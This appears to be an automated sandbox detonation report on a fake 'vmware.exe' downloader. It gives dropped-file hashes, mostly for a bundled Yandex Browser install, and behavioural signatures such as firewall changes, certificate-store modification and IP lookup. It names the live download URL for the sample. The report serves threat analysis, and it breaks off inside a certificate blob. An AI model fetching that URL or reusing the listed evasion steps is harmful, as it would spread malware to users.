SHA512 68932e299ef7c4e5868e16006f193a5d7e606e8f9d96fe0172b4413cb57e5684fd81a3319cddceb3619074299b30a8981a51d9f0d9359af6cb2a2903faf2f533

C:\Windows\Temp\sdwra_5632_436080900\service_update.exe

MD5 7d5dcc6514ef69ab179e6744f853a78a
SHA1 0a7d0ea8fe4234ffd7cca24eb7fb93ad8f045474
SHA256 e80f1cb535a94fdd48bcc06e9b839c2ef831b1ea5f559ecd44bd67efc2a35985
SHA512 0e5eed3976624f207fc85217e60270bf28381a70291b46f7ce2a21c26430aa9e4010f66798b334e4a19cf2aacf5558089612e43edc2a27ba55bcf1e9fbab55a3

C:\ProgramData\Yandex\YandexBrowser\service_update.log

MD5 616bc1bb64201581bfbe8f8194693cba
SHA1 446331ae32af9f114acbe3b8808b6bc8145b1053
SHA256 ef9b55c527fdd1debb0fcbab5d96fb4419fdc8c197e8ceed5e1817da16baee0b
SHA512 3196f415a7d48b9465f7d0292aeaf09d88dce208868d81c91f02fd7454c4daebfca136abf7f7e6970b4b2829d520a3db077d5b510b3a115bb7acb77a9f913afc

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.6.0.1878\Installer\setup.exe

MD5 bfa61a4e9bb19fb367c86bb59b5efedf
SHA1 307693074110f0705df46799c59fbadf713c28fd
SHA256 6b876f9bc56c351a8b15decf839f2704b61040dcc3dcc59b0361956e33670c65
SHA512 bba0d0276405558562a5d7ec04a727b0aa850c961729f4f41d4aa6ea33eae312fc7bf73354961d7bb90af8d913cfca51c0ce6a6872bd7069fe531a5805089be3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.6.0.1878\partner_config

MD5 977bc7b2384ef1b3e78df8fbc3eeb16b
SHA1 7ee6110ca253005d738929b7ba0cc54ed2ed0a2e
SHA256 82e288090168abe15419015317fd38f56c1136e7481f66656d84e0a2d861d4d6
SHA512 4d154832ef3ac05abb1499a5bc8235d72f64cdaa3e6870206a6363c1d85d821604ae8a96850c2c8bd540d479b8dd5f3ce032472ed96bbf7eddb168ea3d2d1cf6

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.6.0.1878\brand_config

MD5 21a3e1e8b2352d3ee79f3cf3249eb5bd
SHA1 1f2d95c3fe89591a09dd8bb19b53ac879809aaa1
SHA256 3a9dcb32b11967a0f9e866dfb476d9f68c37ec4fe4b53f0673f376c8c763d80f
SHA512 01845d48f444a8d9d17a7f96e161b3bec55237c52340016496baf0a9c550ea9d6a7b89ea1359da079032877b0b9a71a6e4dc8312a4b3fd7b2f19a1a2f685b391

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\sea_preview.jpg

MD5 53ba159f3391558f90f88816c34eacc3
SHA1 0669f66168a43f35c2c6a686ce1415508318574d
SHA256 f60c331f1336b891a44aeff7cc3429c5c6014007028ad81cca53441c5c6b293e
SHA512 94c82f78df95061bcfa5a3c7b6b7bf0b9fb90e33ea3e034f4620836309fb915186da929b0c38aa3d835e60ea632fafd683623f44c41e72a879baf19de9561179

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\sea_static.jpg

MD5 5e1d673daa7286af82eb4946047fe465
SHA1 02370e69f2a43562f367aa543e23c2750df3f001
SHA256 1605169330d8052d726500a2605da63b30613ac743a7fbfb04e503a4056c4e8a
SHA512 03f4abc1eb45a66ff3dcbb5618307867a85f7c5d941444c2c1e83163752d4863c5fc06a92831b88c66435e689cdfccdc226472be3fdef6d9cb921871156a0828

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

MD5 20d11a140d4a8cf002b2e215e0530981
SHA1 8b51ef221cdadac07f0d35b750b059d2df542f1e
SHA256 2f69a50fd3bc75d3cd7debc4096430d1d7cf39f04cc81952c0313ced6708f5db
SHA512 81bed05ad47ff203c551c849c9b29b469c9480376a79d7cd113c0a8593efe6db634286f2cad79671f88220a542be2fbcee2bd861baf3cdb932ff4f9e980ed333

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yandex.lnk

MD5 37dc53df4884f46dc833cfc102429183
SHA1 622591ec2cf6bcb5456cea161232e74aead3a446
SHA256 acbad8805f49dbf9ea479acbaa46b8f676909c8e6cb512467cf7263e7ec1b426
SHA512 80c85c89ad508f1d902052ed4970c2ce72eb98bed7e1a52954deb40b6b919e27c220f0d85820927315d0a7c69c59ff229914dba693f892648a80c0cd731893b7

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\install_state.json

MD5 66d54e6cdb1ac35534cc1ccd92bf4c2a
SHA1 c20edb3a98de51ac1e0edd8c56a5f40ff469f903
SHA256 79bb38ec0ec10b3f90f4871ade55c481500a726a8a0ee21e46d5974bc4c72f28
SHA512 bb3ba01bfe7257c7d8039df3f294409050b31e4aa713206e6aa3a84d7451e47cd5fe80116b98856b4540269e3f9dbace05f5c44fe4f20f86c1aba2e494aa6821

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\fe7cc995-756b-4eae-8384-3f4450cd1875.tmp

MD5 9cfdf04d0a3810e577ebfae729a6107f
SHA1 5f6aa5e5c8a9a1981d25d9d4aed46ca4aad1f570
SHA256 639477a0049adda15dd2b2b80057ea8deef8f26ca463ec6e0b65ab9c2c43f346
SHA512 0571bc5a35ae32c240fbb77e246232f8192536dc102a7445ad2d6db0648531bcae53e477abd606a5d0c7cb2bf912257210b7565bfba19d7eba8c7641be3c9713

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Sync Data\LevelDB\CURRENT~RFf77d9db.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Site Characteristics Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Wallpapers\store\picture-13363653417309800

MD5 3bf3da7f6d26223edf5567ee9343cd57
SHA1 50b8deaf89c88e23ef59edbb972c233df53498a2
SHA256 2e6f376222299f8142ff330e457867bad3300b21d96daec53579bf011629b896
SHA512 fef8e951c6cf5cec82dbeafd306de3ad46fd0d90e3f41dcea2a6046c95ab1ae39bf8a6e4a696580246c11330d712d4e6e8757ba24bbf180eec1e98a4aec1583b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Wallpapers\store\preview-13363653417309800

MD5 9f6a43a5a7a5c4c7c7f9768249cbcb63
SHA1 36043c3244d9f76f27d2ff2d4c91c20b35e4452a
SHA256 add61971c87104187ae89e50cec62a196d6f8908315e85e76e16983539fba04b
SHA512 56d7bd72c8a380099309c36912513bcafbe1970830b000a1b89256aae20137c88e1e281f2455bb381ab120d682d6853d1ef05d8c57dd68a81a24b7a2a8d61387

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences

MD5 8afc9198cfd38502b2114e71362c5873
SHA1 a1e1ec63bc037b7c6de52c9f5e693b871d368cb8
SHA256 bf67bd772c82fc7ef08c9b7eb94a7bd0f2a7aa86d530b6f44467b36a486013c2
SHA512 9a2f12ee4c97d01129a602d9f8905c4e41894c6becb99d1324b12f1c7e4fef6a779068a6edc163f081546c61523a1c65aff76c8823a61290d2e48b1f25ef1104

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\992f24b5-f260-4fc4-9604-41de76f0c4f0.tmp

MD5 e83f8ddcd8a44db1f17574eb0f501331
SHA1 0b30ec881ad62158f896ea47f5c70db3806aefd6
SHA256 3bae34ca8c4ca34ad7177a57d3934891651bea573f72a7da8cdf004f897ffee3
SHA512 8a246ea1417825e1de0ee26af667c849175659441dac4c9f115d58ebb68abaac9245b231d787edfa72384ebdf0f170e871fca352b441faa41bc2984bc1a56223

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cache\Cache_Data\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cache\Cache_Data\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\TurboAppCache\Nativecache\b5647938-ba60-4e58-8202-36372a628488\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\6adb7b9e-2c00-46f7-bff7-ed01d9925f64.tmp

MD5 2d81607763a3c4cfc59e8fd69508ee24
SHA1 daf828a4ae794cada3104510d8b6a56131dd6d03
SHA256 2c3dbe111dec9b4c62652aefa20df0c651cfcebd02a00fc9b607b8a8a580f25f
SHA512 dcbe421e07da4705f5e4b82bbbeb57732857178ba38df7b2f50dbf0580ff41a4a38305a10b0adf4f01a13fbb2f31754db20b0bd2df88cdf504c838a7899de6d2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\48.png

MD5 7cf35c8c1a7bd815f6beea2ef9a5a258
SHA1 758f98bfed64e09e0cc52192827836f9e1252fd1
SHA256 67c320fa485a8094fc91cd3fcd59a7c75d2474e3046a7eb274b01863257fbe01
SHA512 0bbebde654c9f44cf56b74fc1a9525b62c88724ec80658efede3cbb370c3a6d4f3e78df459bbd0559a51838f4a172bdfcd370bd5477038309024b77cd69f2a15

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Applications\Manifest Resources\bcadigmkecmhhknameopgaidphameinh\Icons\16.png

MD5 238b0e7dc06028db4b6aba8078740ffb
SHA1 5fd2309587993b371beabb7a9d039e0dba3006ba
SHA256 d159e510392f6da58c4d15cc098171d45c7b02a1362cbf7be7a2d47a1a10e7fc
SHA512 1dda4de21be647067c04dfc47174df39d0c6c1eeee3e9005211f908351b69d6a27ed268b5ec7480285fb203a95136a3a205f7bafb7eb5223a3dcbab0dadc0e5d

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences

MD5 8629df23cd3f9e1b7a1747d4b5244f67
SHA1 57485e69da4e173cbdf1221ba7208ce9c80fb21a
SHA256 2dc1e8de365fc58fcf981824a05362b7eabef16b984c681942bb29a232b8f2f9
SHA512 09cff68c125a409c30099f9061063ceb2538814c3c714614023673fadce1593b8388df2ef4c9161fc699dc1e4419b46166ce88a0b2f02fa5a48189ec2c7cabda

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Secure Preferences

MD5 3c90a25d1954671f935f6736c18383a1
SHA1 2542cd36c983e104ca1a7543949149f8f5aa5841
SHA256 c3f21040fea1f922aa6c9cdc09f06b6d5f951407838fa2f499077747e988bc03
SHA512 aacc41ab651dbbfe575b7adfd7a551e262e589f808edcef2d0f52c2066722370ebeff0c12cc304d8d6c829ecf6fe9b6f5a006c10d0802fd9e5ea623462d206f2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\YandexDictionaries\ru.bdic

MD5 ac3768f0462853d08df284e67c7c4ebd
SHA1 732581ac6f2e02246696817adc53d2e2e5d0dcb5
SHA256 af2bcc135f974aad505a8f55296117dbf4cbc095931e22f424698b181d273656
SHA512 27d558deffeeefe1198aebdf65a3fef0b0f3d6b6c4177d03ff32b0363f0a2fb1b7ff6454f45dd3254427cec9174b03181c50bc51dba212e6ab0114a6e72bcf96

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\component_crx_cache\oimompecagnajdejgnnjijobebaeigek_1.2903aec9f77378fa19280af8ff89294fb9ce2caf8e0092c69e19973c0a9cc6fe

MD5 5d9ad58399fbef9be94190d149c2f863
SHA1 45f3674f0425d58d9ffc5d9001ff6754f357543c
SHA256 2903aec9f77378fa19280af8ff89294fb9ce2caf8e0092c69e19973c0a9cc6fe
SHA512 9a9532cce2de086d5934235d21d27b8a0863ae902a81151a728364aebe044faef5e5805d64efe68d67a5a5aaf408f74954d08f10c6a011dc9ea82c629339d3b0

C:\Users\Admin\AppData\Local\Temp\yandex_browser_updater.log

MD5 601685d81571fff1d73605c5bc55c12a
SHA1 bc3de3f0ee16cf9e234beb9f3854b9e916e09119
SHA256 f55d095763d065704f831ef4b8c133a08c8cbaaaeffffba1f22b19fa2cfe9423
SHA512 ae133f31754b385c1f039f9dd01f135175fca7f84b5bd878c7ab440bf9c40767ce28b36d4bc902f013a4e62a9e4a1dd52cf2b8866215285e9cc8a3b6579ca3ac

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\c3a0c2b0-1ec7-4aaf-86b3-70a488747f10.tmp

MD5 afd7f7a1c33ce199390263e45060412d
SHA1 3d955664cf0cd9ee3cf8ddbb107317871e0f19fd
SHA256 623765a24305d90d897e7ab862eae5bcfd9c0e7f1143d1884f57303de2ea5e00
SHA512 9d397f7a45310994e0204102855a5a329fb81ed26090951511da34c65015edc3b7752591d15b04e46d62172cb86b6b60fddfd994aba35b643493419719bd777b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad\settings.dat

MD5 af643bc376c82e32fe92c738a1037e5d
SHA1 ed1bfe05f318e89e034af03414761d2bb05e0472
SHA256 d3302853d3d797090e3bad57608258a54514363df00bd77b0c46243c4631797b
SHA512 52bfdffa512db4d6b8b3ed9677b89cc8857530ff759149d7c42e33f490266500aff9f968a33a104168855fd525447af942b16f47de7bc84e406e81c84da48333

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 72040e9e6e9fdcd3a5cd8bef97ef60c1
SHA1 770320d890c72aa4a9a1aa68ad416317bfbe301c
SHA256 85b37120f2bac3b0abdef967774fc4b63b4c02b885afb9e261ca5f4e93d5807e
SHA512 8d33d3355495413769a90b4eff48fdd75a458f07d6f76c23a7548de90480e34232ce59c33462dd08765b3d0f8a76327ed0cc11e3963d2595427dc46bda48a693

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-23 21:54

Reported

2024-06-23 21:57

Platform

win10v2004-20240508-en

Max time kernel

28s

Max time network

150s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

Signatures

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e58503e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58503e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = ac0790237ba1da01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\RepId C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{94F46ECB-70E4-4A9D-833B-45BE09247A4E}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{3FDB9D79-31AB-11EF-B8C0-D64620966489} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82af